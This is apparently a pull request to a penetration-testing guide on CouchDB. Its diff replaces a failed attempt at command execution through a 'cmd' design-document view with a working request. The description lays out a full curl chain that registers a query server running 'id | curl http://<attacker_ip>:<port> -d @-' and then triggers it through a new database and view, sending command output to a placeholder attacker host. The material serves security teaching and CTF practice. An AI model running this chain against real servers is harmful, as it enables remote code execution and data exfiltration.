### PR TITLE
Command execution via query_servers fix

### DIFF
--- a/pentesting/5984-pentesting-couchdb.md
+++ b/pentesting/5984-pentesting-couchdb.md
@@ -308,23 +308,11 @@ www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d
 {"ok":true,"id":"zero","rev":"1-967a00dff5e02add41819138abb3284d"}
 ```
 
-Request it in a view. The db will complain about headers, but if we work with it, we can get a bit further:
+Request it in a view:
 
 ```text
-www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}'
-{"error":"bad_request","reason":"Referer header required."}
-
-www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://127.0.0.1:5984
-{"error":"bad_request","reason":"Referer header must match host."}
-
-www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://localhost:5984"
-{"error":"bad_content_type","reason":"Content-Type must be multipart/form-data"}
-
-www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://localhost:5984" -H "Content-Type: multipart/form-data"
-{"error":"case_clause","reason":"undefined","ref":627893255}
+www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' -H "Content-Type: application/json"
 ```
-
-At this point, I am stuck. An undefined “case\_clause” error wasn’t too Googleable. And this isn’t really a path for this box anyway. If you know why it’s breaking here, please let me know!
 
 ## Shodan
 


### PR DESCRIPTION
Hey man, I got a working example, I think the issue is that you are requesting your view with POST rather than PUT method. Following works for me:

curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
curl -X PUT 'http://<target_ip>:5984/testbed'
curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"